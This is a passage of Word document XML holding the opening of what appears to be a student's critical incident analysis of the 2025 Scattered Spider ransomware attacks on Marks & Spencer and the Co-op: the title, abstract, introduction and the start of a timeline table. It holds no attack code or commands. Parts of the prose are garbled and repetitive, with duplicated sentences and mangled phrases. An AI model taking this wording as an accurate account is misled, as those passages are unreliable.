    </w:tbl>
    <w:p w14:paraId="539D9BCA" w14:textId="2FE441DE" w:rsidR="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4A877D" w14:textId="326E9E3C" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="009F4FC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16989117" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F78BB4" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E0928A" w14:textId="77777777" w:rsidR="00304D0A" w:rsidRPr="00C668B5" w:rsidRDefault="00304D0A" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060EC29B" w14:textId="77777777" w:rsidR="00304D0A" w:rsidRPr="00C668B5" w:rsidRDefault="00304D0A" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBAECC4" w14:textId="77777777" w:rsidR="00304D0A" w:rsidRPr="00C668B5" w:rsidRDefault="00304D0A" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CBC6D8" w14:textId="77777777" w:rsidR="00304D0A" w:rsidRPr="00C668B5" w:rsidRDefault="00304D0A" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52792AAD" w14:textId="77777777" w:rsidR="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441B813D" w14:textId="77777777" w:rsidR="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E736B13" w14:textId="77777777" w:rsidR="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5831B455" w14:textId="77777777" w:rsidR="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DB942E" w14:textId="6CDF93B0" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Coursework Task 1 — Critical Incident Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD08A1E" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544F7FD5" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Operation Scattered Spider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7ED8B" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449094D5" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="00304D0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>A Critical Analysis of the 2025 Ransomware Campaign Against Marks &amp; Spencer and The Co-operative Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D876E53" w14:textId="77777777" w:rsidR="00196B7E" w:rsidRPr="00C668B5" w:rsidRDefault="00196B7E" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682A4BC" w14:textId="1D414F2F" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051D91C" w14:textId="709A3F9D" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This report critically examines a cyber-attack on Marks and Spencer (M&amp;S) and Co-operative Group (Co-op) two of the largest retailers based in the United Kingdom that occurred as a spring 2025 cyber campaign. High confidence has been placed on the Scattered Spider threat collective to have been the originators of the campaign as servants of the Dragon Force ransomware-as-a-service platform. Its joint estimated financial impact is estimated as between GBP 270 million and GBP 440 million and the incident was a Category 2 </w:t>
      </w:r>
      <w:r w:rsidR="00246541">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Highly Significant</w:t>
      </w:r>
      <w:r w:rsidR="00246541">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> national cyber event.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D642F2" w14:textId="77777777" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Common Approval of Financial Implications is between GBP 270 million to GBP 440 million and the incident has been categorized as a Category 2 Highly Significant national cyber incident. It creates an evidence-based threat event chronology, maps twelve tactical, technical, and operational adversary methods to the MITRE ATT&amp;CK Enterprise Matrix, investigates technical, organisational, and human root causes, characterizes the threat actor and its motivations, evaluates detection and response capabilities critically, and incorporates ten cost-effective strategic recommendations that are prioritized. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6562A" w14:textId="114DF5A9" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The report took into consideration the data of NCSC advisories, Mandiant threat intelligence, peer-reviewed IEEE literature, and reputable industry reporting. The report relies on the National information security </w:t>
      </w:r>
      <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>center</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> notices, Mandiant threat assessment, peer reviewed IEEE research, and industry reputable coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5D341" w14:textId="77777777" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D744CA" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.  Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBA45B" w14:textId="020CD6E6" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">British high-street retailer </w:t>
      </w:r>
      <w:r w:rsidR="00667584" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>cyber-attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in spring 2025: The operationally debilitating campaign against the UK private sector in recent history. Subjecting M&amp;S during the Easter weekend and cascading to the Co-op and Harrods within a fortnight, the campaign caused long-term service outages, stole the personal data of millions of consumers and disposed of almost GBP 1 billion of market value at M&amp;S at the most effectually [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008A59C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C32B7" w14:textId="164CB6E3" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Joint Incidents Notification Team at the UK Cyber Monitoring Centre designated the combined incidents as a Category 2 Highly Significant national incident, with the estimated losses of GBP 270 million to GBP 440 million [3]. The significance of the campaign is analytical in 3 reasons. To begin with, it shows how financially incentivized, English-speaking criminal gangs are maturing in such a way that they are able to </w:t>
      </w:r>
      <w:r w:rsidR="00BA6ED1" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>organize</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> complex multi-stage intrusion missions without necessarily having to write new exploits [4</w:t>
      </w:r>
      <w:r w:rsidR="008A59C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">5]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417CF0B5" w14:textId="7AE79008" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Second, it revealed systemic risk that is formed by third-party IT supply chains and insufficient helpdesk identity verification [1</w:t>
      </w:r>
      <w:r w:rsidR="008A59C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A59C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">6]. Third, even with significant investment in cybersecurity at M&amp;S, the attacks still took place, which provides evidence of the fact that investment is not enough in the absence of equivalent care with identity management and supply-chain governance [2, 7]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AD249" w14:textId="7041ED04" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>In this report, the M and S and Co-op incidents are considered to be one of the coordinated campaigns, backed by attribution to the same threat actor and almost similar TTPs [8, 9]. The analytical model is based on the MITRE ATT&amp;CK Enterprise Matrix [10], the NCSC advisory literature [7], and the peer-reviewed literature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D633660" w14:textId="77777777" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A532C5" w14:textId="21B66591" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="002B14B2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.  Incident Summary and Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020EAF5A" w14:textId="5B33CEDC" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The chronological structure provided here is a compilation of supported revelations made by the people, official publications, and industry intelligence. Dates that relate to the first stage (February 2025) are based on post incident forensic reports [15][16] as opposed to actual reports because M&amp;S had not disclosed the breach to anything until 22 April 2025 [17].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable5"/>
        <w:tblW w:w="9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1474"/>
        <w:gridCol w:w="4814"/>
        <w:gridCol w:w="1376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="51B99D7F" w14:textId="77777777" w:rsidTr="00BA6ED1">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="233"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000100" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="1" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0869C31A" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="0051437F" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051437F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6E60C9" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="0051437F" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051437F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1183F387" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="0051437F" w:rsidRDefault="00991A73" w:rsidP="00B76B63">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
